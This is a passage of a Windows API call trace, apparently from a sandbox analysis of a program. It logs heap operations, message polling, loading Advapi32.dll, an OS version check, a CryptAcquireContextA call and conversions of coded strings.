lpMsg=0x8cf0a8) returned 0 [0223.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0223.637] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0223.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0223.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0223.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0223.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0223.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0223.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0223.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0223.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0223.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0223.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0223.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0223.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0223.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0223.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0223.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0223.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0223.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0223.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0223.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0223.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0223.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0223.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0223.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0223.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0223.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0223.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0223.638] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0223.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0223.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0223.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0223.638] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0223.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0223.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0223.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0223.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0223.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0223.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0223.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0223.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0223.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0223.639] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0223.639] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.639] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0223.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0223.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0223.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0223.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0223.639] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0223.639] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0223.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0223.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0223.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0223.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0223.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0223.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0223.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0223.639] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0223.639] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0223.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0223.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0223.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0223.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0223.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0223.640] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0223.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0223.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0223.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0223.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0223.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0223.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0223.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0223.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0223.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0223.640] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0223.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0223.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0223.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0223.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0223.640] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0223.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0223.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0223.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0223.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0223.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0223.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0223.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0223.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0223.640] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0223.641] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0223.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0223.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0223.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68460 | out: hHeap=0x2af0000) returned 1 [0223.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0223.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0223.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0223.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0223.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0223.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0223.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0223.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0223.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0223.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0223.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0223.641] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.641] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.641] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0223.641] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.641] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0223.641] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0223.641] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0223.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6f20, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0223.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0223.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7020, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0223.642] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c7f8) returned 1 [0223.643] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.643] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.643] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0223.643] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.643] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0223.643] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.643] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.643] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.643] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.643] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.643] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.643] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0223.643] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.643] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0223.643] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.643] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.643] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.643] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.657] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.657] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.658] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.658] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0223.658] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.658] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0223.658] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.658] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.658] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.658] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.658] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.658] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.658] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.658] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0223.659] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.659] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0223.659] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.659] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.659] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0223.659] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.659] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0223.659] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.659] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.659] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.659] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.659] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0223.659] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.659] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0223.659] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.659] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.659] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.659] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.659] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.659] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.659] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.659] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.659] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.660] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.660] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.660] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0223.660] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.660] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0223.660] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.660] 